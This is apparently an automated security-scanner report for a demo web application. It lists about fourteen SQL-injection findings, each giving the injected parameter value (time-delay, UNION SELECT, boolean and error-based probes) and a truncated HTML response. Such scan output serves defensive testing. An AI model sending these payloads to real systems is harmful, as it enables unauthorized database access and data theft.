href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1065\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ';WAITFOR DELAY '0:0:30'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1066\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1067\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1068\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1069\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #1070\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1071\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RLIKE (SELECT (CASE WHEN (4346=4346) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1072\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1073\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1074\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1075\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1076\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1077\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1078\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io||\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 